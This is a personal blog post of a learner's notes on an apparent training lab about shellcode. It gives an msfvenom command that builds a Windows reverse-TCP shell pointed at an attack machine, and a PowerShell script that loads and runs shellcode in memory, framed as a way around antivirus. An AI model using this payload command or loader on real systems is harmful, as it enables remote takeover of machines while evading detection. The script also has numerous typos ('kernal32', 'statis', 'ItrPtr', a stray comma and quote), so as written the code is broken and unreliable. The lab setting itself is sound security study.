---
title: Post 68 - My head hurts
date: 2024-12-15
tags:
    - shellcode
    - netcat
---
## Task 14, Day 8 `Shellcodes` Shellcodes of the world, unite!  

### Terminology
  - **Shellcode**: Piece of code usually used by malicious actors during exploits like buffer overflow attacks to inject commands into vulnerable systems, often leading to executing arbitrary commands or giving control over a compromised machine. Typically written in assembly language.
  - **PowerShell**: Scripting language and command line shell built into Windows for task automation and config management. Allows interaction with system components. Often used as a post-exploitation tool because of its deep access to system resources and ability to run scripts in memory, avoiding disk-based detection mechanisms.
  - **Windows Defender**: Built-in security feature that can scan code at runtime Common bypasses include obfuscating scripts and refelctive injection, where code is loaded directly into memory avoiding signature based defences.
  - **Windows API**: Allows promgrams to interace with the OS, giving access to system-level functions like memory management, file operations, and networking. Crucial for exploitation because it allows manipulating processes, allocating memory, and executing shell codes. Common functions abused: `VirtualAlloc`, `CreateThread`, and `WaitForSingleObject`.
  - **Windows API through PowerShell Reflection**: Advanced technique that enables interfacing with API from PowerShell. Allows calling API functions directly at runtime instead of needing precompiled binaries. Enables manipulation of low-level system processes allowing interaction with the OS and executing code stealthily while bypassing security mechanisms.
  - **Reverse shell**: Shell connection where the target machine initiates the connection to the attacking machine.

### Generating Shellcode
Chosen method for lesson: `msfvenom -p windows/x64/shell_reverse_tcp LHOST=<attackbox_ip> LPORT=1111 -f powershell`. Shellcode is generated in hex and is run by loading it into memory and creating a thread to execute it. Simple example script to execute the shellcode:  

~~~ c#
$VrtAlloc = @"
using System;
using System.Runtime,InteropServices'

public class VrtAlloc{
    [DllImport("kernal32")] 
    public static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);
}
"@ 

Add-Type $VrtAlloc

$WaitFor= @"
using System;
using System.Runtime.InteropServices;

public class WaitFor{
    [DllImport("kernal32.dll", SetLastError=true)] 
        public static extern UInt32 WaitForSingleObject(IntPtr hHandle, UInt32 dwMilliseconds);
}
"@ 

Add-Type $WaitFor

$CrtThread= @"
using System;
using System.Runtime.InteropServices;

public class CrtThread{
    [DllImport("kernal32", CharSet=CharSet.Ansi)] 
        public statis extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadid);
        
}
"@ 
Add-Type @CrtThread

[Byte[]] $buf = SHELLCODE_PLACEHOLDER
[ItrPtr]$addr = [VrtAlloc]::VirtualAlloc(0, $buf.Length, 0x3000, 0x40)
[System.Runtime.InteropServices.Marshal]::Copy($buf, 0, $addr, $buf.Length)
$thandle = [CrtThread]::CreateThread(0, 0, $addr, 0, 0, 0)
[WaitFor]::WaitForSingleObject($thandle, [uint32]"0xFFFFFFFF")
~~~  

#### Explanation of Code
Starts by defining C# classes that use `DllImport` to load functions from the `kernal32` dll in the API.  
  - `VirtualAlloc`: Allocates memory in the process' address space. Commonly used to prepare memory for storing and executing shellcode.
  - `CreateThread`: Creates a new thread in the process that executes the shellcode in the memory.
  - `WaitForSingleObject`: Pauses exectution until a specific thread finishes its task. In this case ensures shellcode has finished running.  

Classes are added to PowerShell via `Add-Type` command.  

Then script stores the shellcode in `$buf` variable, where `SHELLCODE_PLACEHOLDER` = the hex coe from `msfvenom`. `VirtualAlloc` then allocates the block of memory where the shellcode will be stored using the following arguments:  
  - `0` for memory address means Windows can decide the location.
  - `$buf.length` for the size of the memory block bases size on length of the shellcode.
  - `0x3000` for allocation type tells Windows to reserve and commit the memmory.
  - `0x40` for memory protection means memory is readable and executable.  

`Marshal.Copy` then copies the shellcode from `$buf` to the allocated memory address. `CreatThread` then executes the shellcode by creating a new thread. `WaitForSingleObject` then makes sure the shellcode runs completely before the script ends its execution.  

### The Task
Use the shellcode and C# code generated/written earlier to get a remote shell and get the flag. Had a lot of trouble because I couldn't paste into the Windows VM and made a mess of copying the code over by hand, then didn't even want to attempt typing in the hex. Finally realized I could RDP into it with Remminna and the clipboard worked between the two. 

### Recommended Stuff
AV Evasion: Shellcode room
